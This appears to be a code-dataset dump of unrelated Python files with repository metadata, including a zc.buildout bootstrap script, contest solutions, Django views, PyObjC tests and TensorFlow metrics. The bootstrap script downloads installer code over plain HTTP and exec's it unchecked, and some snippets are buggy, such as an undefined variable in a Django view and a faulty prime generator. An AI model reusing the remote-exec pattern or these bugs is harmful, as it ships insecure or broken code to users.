tmpeggs = tempfile.mkdtemp()
is_jython = sys.platform.startswith('java')
# parsing arguments
parser = OptionParser(
'This is a custom version of the zc.buildout %prog script. It is '
'intended to meet a temporary need if you encounter problems with '
'the zc.buildout 1.5 release.')
parser.add_option("-v", "--version", dest="version", default='1.4.4',
help='Use a specific zc.buildout version. *This '
'bootstrap script defaults to '
'1.4.4, unlike usual buildpout bootstrap scripts.*')
parser.add_option("-d", "--distribute",
action="store_true", dest="distribute", default=False,
help="Use Disribute rather than Setuptools.")
parser.add_option("-c", None, action="store", dest="config_file",
help=("Specify the path to the buildout configuration "
"file to be used."))
options, args = parser.parse_args()
# if -c was provided, we push it back into args for buildout' main function
if options.config_file is not None:
args += ['-c', options.config_file]
if options.version is not None:
VERSION = '==%s' % options.version
else:
VERSION = ''
USE_DISTRIBUTE = options.distribute
args = args + ['bootstrap']
to_reload = False
try:
import pkg_resources
if not hasattr(pkg_resources, '_distribute'):
to_reload = True
raise ImportError
except ImportError:
ez = {}
if USE_DISTRIBUTE:
exec urllib2.urlopen('http://python-distribute.org/distribute_setup.py'
).read() in ez
ez['use_setuptools'](to_dir=tmpeggs, download_delay=0, no_fake=True)
else:
exec urllib2.urlopen('http://peak.telecommunity.com/dist/ez_setup.py'
).read() in ez
ez['use_setuptools'](to_dir=tmpeggs, download_delay=0)
if to_reload:
reload(pkg_resources)
else:
import pkg_resources
if sys.platform == 'win32':
def quote(c):
if ' ' in c:
return '"%s"' % c # work around spawn lamosity on windows
else:
return c
else:
def quote (c):
return c
ws = pkg_resources.working_set
if USE_DISTRIBUTE:
requirement = 'distribute'
else:
requirement = 'setuptools'
env = dict(os.environ,
PYTHONPATH=
ws.find(pkg_resources.Requirement.parse(requirement)).location
)
cmd = [quote(sys.executable),
'-c',
quote('from setuptools.command.easy_install import main; main()'),
'-mqNxd',
quote(tmpeggs)]
if 'bootstrap-testing-find-links' in os.environ:
cmd.extend(['-f', os.environ['bootstrap-testing-find-links']])
cmd.append('zc.buildout' + VERSION)
if is_jython:
import subprocess
exitcode = subprocess.Popen(cmd, env=env).wait()
else: # Windows prefers this, apparently; otherwise we would prefer subprocess
exitcode = os.spawnle(*([os.P_WAIT, sys.executable] + cmd + [env]))
assert exitcode == 0
ws.add_entry(tmpeggs)
ws.require('zc.buildout' + VERSION)
import zc.buildout.buildout
zc.buildout.buildout.main(args)
shutil.rmtree(tmpeggs)
| [
"hamza@gmail.com"
] | hamza@gmail.com |
6ff49b287f974270f1f0ae428a47faaa8bfd7917 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03018/s719990159.py | 1ca3886d16372d3fff541701f826d87af32d984f | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | s=input().replace("BC","X")
ans=0
acc=0
for i in range(len(s)):
if s[i]=="B" or s[i]=="C":
acc=0
elif s[i]=="A":
acc+=1
elif s[i]=="X":
ans+=acc
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
e55bb7d0e2394ed842d96643697053021e38e637 | 4142b8c513d87361da196631f7edd82f11465abb | /python/round550/1144A.py | 58cb00fccbaacef165270928c128d3c682aaeb87 | [] | no_license | npkhanhh/codeforces | b52b66780426682ea1a3d72c66aedbe6dc71d7fe | 107acd623b0e99ef0a635dfce3e87041347e36df | refs/heads/master | 2022-02-08T17:01:01.731524 | 2022-02-07T10:29:52 | 2022-02-07T10:29:52 | 228,027,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from sys import stdin
for _ in range(int(stdin.readline())):
s = sorted(list(stdin.readline().strip()))
direction = 0
res = 'Yes'
for i in range(1, len(s)):
cur = ord(s[i]) - ord(s[i-1])
if cur != 1:
res = 'No'
break
print(res)
| [
"npkhanh93@gmail.com"
] | npkhanh93@gmail.com |
0edac64487d82dd2cf104d28b0e826a21bc6b79f | 347569ec4be307e9ae78286da0280e95f2689d27 | /updates/api/views.py | 5459b3e9930bbcbebfcb0667eb7554762f17a222 | [] | no_license | rahulsayon/Django-api | f45763330e91ffb9ccb12b686b9c0cb2af7d6fbb | f7d042086ad34f59a6ae92d920f2426b91ddda7b | refs/heads/master | 2022-12-11T01:33:48.193457 | 2020-09-19T19:26:14 | 2020-09-19T19:26:14 | 296,937,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,645 | py | #from django.shortcuts import render
# Create your views here.
from updates.models import Update as UpdateModel
from django.views.generic import View
from django.http import HttpResponse
from updates.mixin import CSRFExemptMixin
from cfeapi.mixins import HttpResponseMixin
import json
class UpdateModelDetailAPIView(HttpResponseMixin,CSRFExemptMixin,View):
is_json = True
def get(self , request , id ,*args , **kwargs):
obj = UpdateModel.objects.get(id=1)
json_data = obj.serialize()
return self.render_to_response(json_data)
def post(self , request , *args , **kwargs):
json_data = {}
return self.render_to_response(json_data)
def put(self , request , *args, **kwargs):
json_data = {}
return self.render_to_response(json_data)
def delete(self , request , *args , **kwargs):
json_data = {}
return self.render_to_response(json_data , status=403)
class UpdateModelListAPIView(HttpResponseMixin,CSRFExemptMixin,View):
is_json = True
def get(self , request , *args , **kwargs):
qs = UpdateModel.objects.all()
json_data = qs.serialize()
#return HttpResponse(json_data , content_type='application/json')
return self.render_to_response(data)
def post(self , request , *args , **kwargs):
data = json.dumps({"message" : "Unkonw data"})
#return HttpResponse(data , content_type='application/json')
return self.render_to_response(data , status=400)
def delete(self , request , *args , **kwargs):
data = json.dumps({"message" : "you can not delete an entire list"})
status_code = 403
return self.render_to_response(data, status=403)
| [
"rahulsayon95@gmail.com"
] | rahulsayon95@gmail.com |
5748278cb172838464abd74abc7813dda1031e03 | f80ef3a3cf859b13e8af8433af549b6b1043bf6e | /pyobjc-framework-Cocoa/PyObjCTest/test_nsfilewrapper.py | 8f242fb17d835c1952adda1f7f75d57c09d1e3a9 | [
"MIT"
] | permissive | ronaldoussoren/pyobjc | 29dc9ca0af838a56105a9ddd62fb38ec415f0b86 | 77b98382e52818690449111cd2e23cd469b53cf5 | refs/heads/master | 2023-09-01T05:15:21.814504 | 2023-06-13T20:00:17 | 2023-06-13T20:00:17 | 243,933,900 | 439 | 49 | null | 2023-06-25T02:49:07 | 2020-02-29T08:43:12 | Python | UTF-8 | Python | false | false | 2,001 | py | import AppKit
import Foundation
from PyObjCTools.TestSupport import TestCase, min_os_level
class TestNSFileWrapper(TestCase):
def test_enum_types(self):
self.assertIsEnumType(Foundation.NSFileWrapperReadingOptions)
self.assertIsEnumType(Foundation.NSFileWrapperWritingOptions)
def testMethods(self):
self.assertResultIsBOOL(
AppKit.NSFileWrapper.writeToFile_atomically_updateFilenames_
)
self.assertArgIsBOOL(
AppKit.NSFileWrapper.writeToFile_atomically_updateFilenames_, 1
)
self.assertArgIsBOOL(
AppKit.NSFileWrapper.writeToFile_atomically_updateFilenames_, 2
)
self.assertResultIsBOOL(AppKit.NSFileWrapper.isRegularFile)
self.assertResultIsBOOL(AppKit.NSFileWrapper.isDirectory)
self.assertResultIsBOOL(AppKit.NSFileWrapper.isSymbolicLink)
self.assertResultIsBOOL(AppKit.NSFileWrapper.needsToBeUpdatedFromPath_)
self.assertResultIsBOOL(AppKit.NSFileWrapper.updateFromPath_)
@min_os_level("10.6")
def testConstants10_6(self):
self.assertEqual(AppKit.NSFileWrapperReadingImmediate, 1 << 0)
self.assertEqual(AppKit.NSFileWrapperReadingWithoutMapping, 1 << 1)
self.assertEqual(AppKit.NSFileWrapperWritingAtomic, 1 << 0)
self.assertEqual(AppKit.NSFileWrapperWritingWithNameUpdating, 1 << 1)
@min_os_level("10.6")
def testMethods10_6(self):
self.assertArgIsOut(AppKit.NSFileWrapper.initWithURL_options_error_, 2)
self.assertResultIsBOOL(AppKit.NSFileWrapper.matchesContentsOfURL_)
self.assertResultIsBOOL(AppKit.NSFileWrapper.readFromURL_options_error_)
self.assertArgIsOut(AppKit.NSFileWrapper.readFromURL_options_error_, 2)
self.assertResultIsBOOL(
AppKit.NSFileWrapper.writeToURL_options_originalContentsURL_error_
)
self.assertArgIsOut(
AppKit.NSFileWrapper.writeToURL_options_originalContentsURL_error_, 3
)
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
f1d8ef12acecd27c70767e80673ba6b6dba7adba | 52f68b99981d16a6297ecacd4e8b92790daf0ef9 | /23.py | 05b94be1851770ce14ec01cce3b09e51adce1d35 | [] | no_license | ComputahSaysNo/AOC_2019 | a960214257016d2f376b20381a84bc3ba60f9f63 | 35867882647e1923a27216dae85388f13e402a68 | refs/heads/master | 2020-11-24T01:55:00.153911 | 2020-07-18T08:58:09 | 2020-07-18T08:58:09 | 227,914,439 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,901 | py | from processInputs import get_formatted_input
from intcode import IntcodeComputer
def part_1_and_2(data):
outputs = []
for part in (1, 2):
packetQueue = []
def inf():
return -1
network = [IntcodeComputer(data, inf) for i in range(50)]
for i in range(50):
network[i].give_next_input(i)
packetQueue.append([])
nat = [0, 0]
history = []
running = True
while running:
idle = True
for i in range(len(network)):
computer = network[i]
queue = packetQueue[i]
if len(queue) == 0:
computer.give_next_input(-1)
else:
idle = False
while (len(queue)) > 0:
packet = queue.pop(0)
computer.give_next_input(packet[0])
computer.give_next_input(packet[1])
while len(computer.outputs) > 0:
dest, x, y = computer.outputs[-3], computer.outputs[-2], computer.outputs[-1]
if dest == 255:
if part == 1:
outputs.append(y)
running = False
nat = [x, y]
else:
packetQueue[dest].append([x, y])
computer.outputs = computer.outputs[:-3]
if idle:
packetQueue[0].append(nat)
history.append(nat)
if len(history) > 2:
history.pop(0)
if history[-1][1] == history[-2][1]:
if history[-1][1] != 0:
outputs.append(history[-1][1])
return outputs
INPUT = get_formatted_input(23)
print(part_1_and_2(INPUT))
| [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
bc784b221bfe2c3829ae2b9ef8a9c755c1dee450 | f07b0142e37afe0bf8ed4d56399a0a49f5b1801b | /lino_xl/lib/beid/views.py | 2eeb93702cb6494e66469ccf7a09193753635492 | [
"BSD-2-Clause"
] | permissive | khchine5/xl | af70fb21e4caeb05ff62e9618113c278d71a75ed | b1634937a9ce87af1e948eb712b934b11f221d9d | refs/heads/master | 2021-01-20T22:51:01.193260 | 2018-08-22T07:47:43 | 2018-08-22T07:47:43 | 52,145,840 | 1 | 0 | BSD-2-Clause | 2018-08-19T12:29:06 | 2016-02-20T09:21:19 | Python | UTF-8 | Python | false | false | 2,578 | py | # -*- coding: UTF-8 -*-
# Copyright 2018 Rumma 6 Ko Ltd
# License: BSD (see file COPYING for details)
"""Views for `lino.modlib.bootstrap3`.
"""
from __future__ import division
from os.path import join
import time
import json
# from django import http
# from django.conf import settings
from django.views.generic import View
# from django.core import exceptions
from lino.core.views import json_response
from lino.api import dd, _
def load_card_data(uuid):
# raise Exception("20180412 {}".format(uuid))
fn = dd.plugins.beid.data_cache_dir.child(uuid)
timeout = dd.plugins.beid.eidreader_timeout
count = 0
while True:
try:
fp = open(fn)
rv = json.load(fp)
fp.close()
# dd.logger.info("20180412 json.load({}) returned {}".format(
# fn, rv))
return rv
# raise Warning(
# _("Got invalid card data {} from eidreader.").format(rv))
except IOError as e:
# dd.logger.info("20180412 {} : {}".format(fn, e))
time.sleep(1)
count += 1
if count > timeout:
raise Warning(_("Abandoned after {} seconds").format(
timeout))
# rv = dict(success=False)
# break
# continue
class EidStore(View):
# def get(self, request, uuid, **kw):
# print("20180412 GET {} {}".format(uuid, request.GET))
# return json_response()
def post(self, request, uuid, **kw):
# uuid = request.POST.get('uuid')
card_data = request.POST.get('card_data')
# card_data = json.loads(card_data)
# msg = "20180412 raw data {}".format(request.body)
# dd.logger.info(msg)
# if not card_data:
# raise Exception("No card_data found in {}".format(
# request.POST))
fn = dd.plugins.beid.data_cache_dir.child(uuid)
# pth = dd.plugins.beid.data_cache_dir
# pth = join(pth, uuid)
try:
fp = open(fn, 'w')
fp.write(card_data)
# json.dump(card_data, fp)
fp.close()
except IOError as e:
dd.logger.warning(
"Failed to store data to file %s : %s", fn, e)
# msg = "20180412 wrote {} {}".format(fn, card_data)
# dd.logger.info(msg)
# username = request.POST.get('username')
# return http.HttpResponseRedirect(target)
return json_response(dict(success=True, message="OK"))
| [
"luc.saffre@gmail.com"
] | luc.saffre@gmail.com |
a330663f1e5ce3fc16f9eef56bfaed1bdf134cee | 2ed7f1e1f59832e91fe0402eca82ecf6fea2be40 | /0x05-python-exceptions/2-safe_print_list_integers.py | 70935bd34066cc1d54b184070aff6075e7e38cb5 | [] | no_license | Leidysalda/holbertonschool-higher_level_programming | abf3159db916ec293fc219b591e2c44f74afe3f3 | 46c04cdc7b76afbd79c650ff258f85aef7d2d5fe | refs/heads/master | 2020-09-29T02:40:47.437740 | 2020-09-23T05:37:10 | 2020-09-23T05:37:10 | 259,387,894 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | #!/usr/bin/python3
def safe_print_list_integers(my_list=[], x=0):
acum = 0
for i in range(0, x):
try:
print('{:d}'.format(my_list[i]), end='')
acum += 1
except (ValueError, TypeError):
pass
print('')
return (acum)
| [
"leidysalda1@gmail.com"
] | leidysalda1@gmail.com |
5efdcea0b197ce67a1ce02ffb34ddfc54e626264 | d88ede90d3434d56b00bdc530711208e1673b245 | /从字符串中提取省-市-区/main.py | 5c40573f246b912751d8027fc17bad7edbbbf992 | [] | no_license | SmallPotY/SmallUtil | 0ec84fab01ce7b46cf44f839ed0f7b2d63bad0cb | 0761283fc1f41ac909a1705aa3f31d925691189f | refs/heads/master | 2020-06-13T22:49:12.060011 | 2019-08-12T06:08:33 | 2019-08-12T06:08:33 | 194,813,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | # -*- coding:utf-8 -*-
import cpca
import os
path = os.path.dirname(__file__)
file = path + "/地址字符串.txt"
location_str = []
with open(file, 'r', encoding='utf-8') as f:
while True:
line = f.readline().splitlines()
if not line:
break
location_str.append(line[0])
# print(location_str)
df = cpca.transform(location_str, cut=False,pos_sensitive=True)
df.to_csv('省-市-区.csv', encoding="utf_8_sig")
| [
"1041132457@qq.com"
] | 1041132457@qq.com |
b12910bde72865270b33d213ed7d7729845c413b | c3b739b07214507bf1023b926c19d30784623e98 | /segme/metric/sad.py | 6a214ab8ef8f566f2f85cda2e1f6aa8e227f5ec3 | [
"MIT"
] | permissive | templeblock/segme | 20a96787500c46483cb7af0db917207fcedafb0b | 8192ed066558c1ea1e7283805b40da4baa5b3827 | refs/heads/master | 2023-08-30T12:31:39.327283 | 2021-11-11T17:08:40 | 2021-11-11T17:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,015 | py | import tensorflow as tf
from keras.metrics import SumOverBatchSize, metrics_utils
from keras.utils import losses_utils
from keras.utils.generic_utils import register_keras_serializable
@register_keras_serializable(package='SegMe')
class SAD(SumOverBatchSize):
def __init__(self, divider=255., name='sad', dtype=None):
"""Creates a `SumAbsoluteDifference` instance for matting task (by default downscales input by 255).
Args:
divider: A float value for input scaling.
name: (Optional) string name of the metric instance.
dtype: (Optional) data type of the metric result.
"""
super().__init__(name, dtype=dtype)
self.divider = divider
def update_state(self, y_true, y_pred, sample_weight=None):
y_true = tf.cast(y_true, self._dtype)
y_pred = tf.cast(y_pred, self._dtype)
if sample_weight is not None:
sample_weight = tf.cast(sample_weight, self._dtype)
[y_true, y_pred], sample_weight = metrics_utils.ragged_assert_compatible_and_get_flat_values(
[y_true, y_pred], sample_weight)
if sample_weight is None:
y_pred, y_true = losses_utils.squeeze_or_expand_dimensions(y_pred, y_true, sample_weight)
else:
y_pred, y_true, sample_weight = losses_utils.squeeze_or_expand_dimensions(y_pred, y_true, sample_weight)
values = sum_absolute_difference(y_true, y_pred, sample_weight)
return super().update_state(values / self.divider)
def result(self):
return super().result() / 1000.
def get_config(self):
config = super().get_config()
config.update({'divider': self.divider})
return config
def sum_absolute_difference(y_true, y_pred, sample_weight=None):
result = tf.abs(y_pred - y_true)
if sample_weight is not None:
result *= sample_weight
axis_hwc = list(range(1, result.shape.ndims))
result = tf.reduce_sum(result, axis=axis_hwc)
return result
| [
"shkarupa.alex@gmail.com"
] | shkarupa.alex@gmail.com |
1d3ab882c43c70cb14004d2256ccf46c2ffbd651 | 050ca74a2b304d49709050585424114f0a6bc1a7 | /tools/generate_taint_models/get_REST_api_sources.py | 01752c36104efc14cf8da804112946938b1fcb26 | [
"MIT"
] | permissive | tholiao/pyre-check | fcc1019c63ad27dcec920ecee1464c0507a68672 | f5705fb5dae6a78623a058e5972461e89e283634 | refs/heads/master | 2020-06-23T15:25:36.468656 | 2019-07-24T15:33:38 | 2019-07-24T15:33:38 | 198,662,804 | 0 | 0 | MIT | 2019-07-24T15:30:31 | 2019-07-24T15:30:30 | null | UTF-8 | Python | false | false | 1,357 | py | # Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import inspect
import types
from typing import Callable, Iterable
from .inspect_parser import extract_annotation, extract_name, extract_view_name
from .model import CallableModel
from .model_generator import Configuration, Registry
from .view_generator import ViewGenerator
class RESTApiSourceGenerator(ViewGenerator):
def compute_models(
self, functions_to_model: Iterable[Callable[..., object]]
) -> Iterable[str]:
entry_points = set()
for view_function in functions_to_model:
view_name = extract_view_name(view_function)
if view_name in Configuration.whitelisted_views:
continue
model = CallableModel(
callable=view_function,
arg="TaintSource[UserControlled]",
vararg="TaintSource[UserControlled]",
kwarg="TaintSource[UserControlled]",
whitelisted_parameters=Configuration.whitelisted_classes,
).generate()
if model is not None:
entry_points.add(model)
return sorted(entry_points)
Registry.register("get_REST_api_sources", RESTApiSourceGenerator)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
d8a2c27e6abe1ff0606d58ea519950a06e4de596 | 70f5264401822933a25a94101f648d385362b87b | /demo1.py | 6ba70b66f563d654ef5538db55f502ec3cb763c0 | [] | no_license | aspiringguru/COVID_data_analysis | aa859ecc5bc76b4c68a526efd52ae2fc0a8f67db | 86004246a7199807d3b7751f42d934ffe3e6bf41 | refs/heads/master | 2021-05-22T22:06:33.358741 | 2020-04-05T07:25:38 | 2020-04-05T07:25:38 | 253,117,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,860 | py | import pandas as pd
import os
mypath = "../data.bls.gov/unemployment_rate/"
file_list = []
for file in os.listdir(mypath):
if file.endswith(".xlsx"):
print(os.path.join(mypath, file))
file_list.append(os.path.join(mypath, file))
file_list
col_names = []
combined_results = pd.DataFrame(columns = col_names)
for filename in file_list:
# Read File
print("opening filename:", filename)
df = pd.read_excel(filename, sheet_name="BLS Data Series")
#df = pd.read_excel(file_list[0], sheet_name="BLS Data Series")
#df.shape
series_id = df.iloc[2,1]
print("series_id:", series_id)
series_id_text = df.iloc[4,1]
print("series_id_text:", series_id_text)
#now detect rownumber where data starts and ends.
#find row with first value of 'Year' in column 0
#and first non null value in column 0 after that.
first_col = df.iloc[:, 0]
#first_col
start_row_index = first_col[first_col == 'Year'].index[0]
#start_row_index
last_row_index = len(first_col)
#last_row_index
df_data = df.iloc[start_row_index+1:last_row_index,0:13]
#df_data
#df_info = df.iloc[4:9,0:2]
#df_data = df.iloc[11:32,0:13]
new_col_names = list(df.iloc[start_row_index, :])
#new_col_names
print("df_data.shape:", df_data.shape)
#print(df_data.head())
df_data.columns = new_col_names
#print(df_data.head())
#df_data
df_data_cleaned = pd.melt(df_data, id_vars=['Year'])
df_data_cleaned = df_data.melt('Year')
df_data_cleaned['date'] = df_data_cleaned['Year'].astype('str') + '-' + df_data_cleaned['variable']
#df_data_cleaned
df_data_cleaned.drop(['Year', 'variable'], axis=1, inplace=True)
#df_data_cleaned
df_data_cleaned.dropna(inplace=True)
df_data_cleaned.rename(columns={"value": series_id}, inplace=True)
#
print("df_data_cleaned\n", df_data_cleaned)
#series_id
#series_id_text
output_filename = filename+"_"+series_id+"_"+series_id_text+".csv"
print("saving as csv file:", output_filename)
df_data_cleaned[['date', series_id]].to_csv(output_filename, index=False)
#df_data_cleaned
#append x to combined_results
if len(combined_results.columns)==0:
print("combined_results is empty. combined_results.shape=", combined_results.shape)
combined_results = df_data_cleaned[['date', series_id]]
else:
print("combined_results not empty, joining column from df_data_cleaned")
#add the series_id column to combined_results (years should be the same)
combined_results[series_id] = df_data_cleaned[series_id]
print("after adding new data column, combined_results.shape:", combined_results.shape)
combined_results.to_csv(mypath+"combined_results.csv", index=False)
| [
"bmatthewtaylor@gmail.com"
] | bmatthewtaylor@gmail.com |
c7a6d37da7b8e7990c140909ac230c2be4083302 | 31ee112d47d3a2b2383498646eff5eb8c7368465 | /collective/scss/stylesheet.py | b1f5bf14ca3b9447bed8f60b56a3b2af06a037bd | [] | no_license | collective/collective.scss | acf7f8313d4584e0a0e2c08756f5bf8ed639149c | b4d86613d3be1d433a118033395416e84df4ad54 | refs/heads/master | 2023-07-15T10:01:19.302332 | 2011-11-25T23:34:21 | 2011-11-25T23:34:21 | 2,681,508 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | from Products.Five.browser import BrowserView
from scss import parser
class SCSSView(BrowserView):
"""SCSS base stylesheet view"""
def __call__(self):
# defer to index method, because that's what gets overridden by the template ZCML attribute
scss = self.index().encode('utf-8')
p = parser.Stylesheet()
css = str(p.loads(scss))
self.request.response.setHeader("Content-type", "text/css")
return css
| [
"toutpt@gmail.com"
] | toutpt@gmail.com |
4ae44a52ae0a90f5ce6d3046a79f21566eb04efa | 22dcd52b6a07e82e8db9bf8b7ad38711d12f69a8 | /venv/Lib/site-packages/sklearn/utils/seq_dataset.py | 738c8a6be16c864aebeade2eb9ded721332807e8 | [] | no_license | MrGreenPepper/music_cluster | 9060d44db68ae5e085a4f2c78d36868645432d43 | af5383a7b9c68d04c16c1086cac6d2d54c3e580c | refs/heads/main | 2023-08-15T09:14:50.630105 | 2021-10-01T09:45:47 | 2021-10-01T09:45:47 | 412,407,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py |
# THIS FILE WAS AUTOMATICALLY GENERATED BY deprecated_modules.py
import sys
from . import _seq_dataset
from ..externals._pep562 import Pep562
from ..utils.deprecation import _raise_dep_warning_if_not_pytest
deprecated_path = 'sklearn.utils.seq_dataset'
correct_import_path = 'sklearn.utils'
_raise_dep_warning_if_not_pytest(deprecated_path, correct_import_path)
def __getattr__(name):
return getattr(_seq_dataset, name)
if not sys.version_info >= (3, 7):
Pep562(__name__)
| [
"sebastian_truemper@posteo.de"
] | sebastian_truemper@posteo.de |
564fd5a85ad260577bd5d9828960654f8cfe79e5 | 0e448933dd67f9233e8dbd198ea6d27e6afd67d9 | /account/forms.py | 0a610959a986d3a1036d3f5c2db086249e5f414e | [] | no_license | achiengcindy/bookmarks | 1ef1d301508eb45775f724b6da2b343df8543fbb | e4c47b02f13bd55c2773775bc4843f63efa5264f | refs/heads/master | 2021-08-27T20:28:32.644574 | 2017-11-28T07:32:04 | 2017-11-28T07:32:04 | 111,144,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | from django.contrib.auth.models import User
from django import forms
from .models import Profile
class LoginForm(forms.Form):
username = forms.CharField()
password = forms.CharField(widget=forms.PasswordInput)
class UserRegistrationForm(forms.ModelForm):
password = forms.CharField(label='Password',
widget=forms.PasswordInput)
password2 = forms.CharField(label='Repeat password',widget=forms.PasswordInput)
class Meta:
model = User
fields = ('username', 'first_name', 'email')
def clean_password2(self):
cd = self.cleaned_data
if cd['password'] != cd['password2']:
raise forms.ValidationError('Passwords don\'t match.')
return cd['password2']
#user edit profile
class UserEditForm(forms.ModelForm):
class Meta:
model = User
fields = ('first_name', 'last_name', 'email')
class ProfileEditForm(forms.ModelForm):
class Meta:
model = Profile
fields = ('date_of_birth', 'photo') | [
"achiengcindy36@gmail.com"
] | achiengcindy36@gmail.com |
fd236e862a9bfd7c3bfe8192e30f9f77cfa9536d | cbb450f658bec796e26061bdeafcd1cc44ee1159 | /fzhtzj/fjhtzj/apps/news/migrations/0001_initial.py | e8f29fe37d553fa16e883eac1c3fe7a915ccbd1c | [] | no_license | ylz1990/htzj | 4ddd4701ead6a49d254ff6df94d9db6a69066a79 | 6bf1192032b985a484dc9b2221f17410eb4475dc | refs/heads/master | 2022-01-06T16:11:46.918336 | 2019-07-10T06:33:34 | 2019-07-10T06:33:34 | 192,693,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | # Generated by Django 2.2 on 2019-06-27 08:32
from django.db import migrations, models
import tinymce.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='News',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(help_text='标题', max_length=150, verbose_name='标题')),
('tags', models.CharField(help_text='新闻类型', max_length=200, verbose_name='新闻类型')),
('content', tinymce.models.HTMLField()),
('create_date', models.DateTimeField(auto_now=True, help_text='发布时间', verbose_name='发布时间')),
],
options={
'ordering': ['-create_date', '-id'],
'verbose_name': '新闻',
'verbose_name_plural': '新闻',
'db_table': 'tb_news',
},
),
]
| [
"pyvip@Vip.tz.cn"
] | pyvip@Vip.tz.cn |
cdea9475506ef06acc12eeb3f1d3d8b27d47ca55 | f26937e8cd0b07589ba1cf6275596d97488cda7e | /scrapySpider/mongoTest/build/lib/mongoTest/items.py | 29119a5da459eab04fe94c97ff82d545bd0fe6ff | [] | no_license | HezhouW/hive | 4aa46a045d22de121e2903075e74c3c9fd75ec1f | 3a7de0c18cbe0ec81e0b40c3217dd5b1a15cf464 | refs/heads/master | 2022-02-27T04:52:42.704501 | 2019-05-24T02:40:49 | 2019-05-24T02:40:49 | 123,524,369 | 1 | 0 | null | 2018-03-02T03:18:07 | 2018-03-02T03:18:07 | null | UTF-8 | Python | false | false | 349 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class MongotestItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
title = scrapy.Field()
movieName = scrapy.Field()
pass
| [
"954316227@qq.com"
] | 954316227@qq.com |
bec4142b26da34cb0e079f5600d4f9ab3ce563bf | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_070/ch32_2020_03_26_21_55_29_000008.py | 802d7b3dde9f7a743884523a2716fe29a7ee7fd9 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | def lista_primos(n):
a=2
i=3
x=0
lista=[0]*n
while x<n:
lista[x]=a
a+=1
if a%2==0:
while a%2==0 or (a%i==0 and a>i):
i=3
a+=1
while a%i!=0 and a>i:
i+=2
x+=1
else:
x+=1
return lista | [
"you@example.com"
] | you@example.com |
bc264ae9d065b64acd9d84fbc3f04a67c2052ea3 | 048c4c7a0a7956e976a0cd0512ca9536c8aeb82d | /tefla/core/image_quality.py | 455ca6156c6fccba2695fb40016fc2844ff044e9 | [
"MIT"
] | permissive | mkulariya1/tefla | 40d41242f08b4431a08f7dc6680088a234da5191 | 8de25c1b67dcf025535f5e8c40539de59acd7fb8 | refs/heads/master | 2020-04-24T15:46:51.866942 | 2019-02-04T18:33:49 | 2019-02-04T18:33:49 | 172,082,029 | 0 | 0 | NOASSERTION | 2019-02-22T14:41:53 | 2019-02-22T14:41:53 | null | UTF-8 | Python | false | false | 5,967 | py | """Python implementation of MS-SSIM."""
import numpy as np
from scipy import signal
from scipy.ndimage.filters import convolve
def FSpecialGauss(size, sigma):
"""Function to mimic the 'fspecial' gaussian MATLAB function."""
radius = size // 2
offset = 0.0
start, stop = -radius, radius + 1
if size % 2 == 0:
offset = 0.5
stop -= 1
x, y = np.mgrid[offset + start:stop, offset + start:stop]
assert len(x) == size
g = np.exp(-((x**2 + y**2) / (2.0 * sigma**2)))
return g / g.sum()
def SSIMForMultiScale(img1, img2, max_val=255, filter_size=11, filter_sigma=1.5, k1=0.01, k2=0.03):
"""Return the Structural Similarity Map between `img1` and `img2`. This
function attempts to match the functionality of ssim_index_new.m by Zhou
Wang: http://www.cns.nyu.edu/~lcv/ssim/msssim.zip.
Args:
img1: Numpy array holding the first RGB image batch.
img2: Numpy array holding the second RGB image batch.
max_val: the dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
filter_size: Size of blur kernel to use (will be reduced for small images).
filter_sigma: Standard deviation for Gaussian blur kernel (will be reduced
for small images).
k1: Constant used to maintain stability in the SSIM calculation (0.01 in
the original paper).
k2: Constant used to maintain stability in the SSIM calculation (0.03 in
the original paper).
Returns:
Pair containing the mean SSIM and contrast sensitivity between `img1` and
`img2`.
Raises:
RuntimeError: If input images don't have the same shape or don't have four
dimensions: [batch_size, height, width, depth].
"""
if img1.shape != img2.shape:
raise RuntimeError('Input images must have the same shape (%s vs. %s).', img1.shape, img2.shape)
if img1.ndim != 4:
raise RuntimeError('Input images must have four dimensions, not %d', img1.ndim)
img1 = img1.astype(np.float64)
img2 = img2.astype(np.float64)
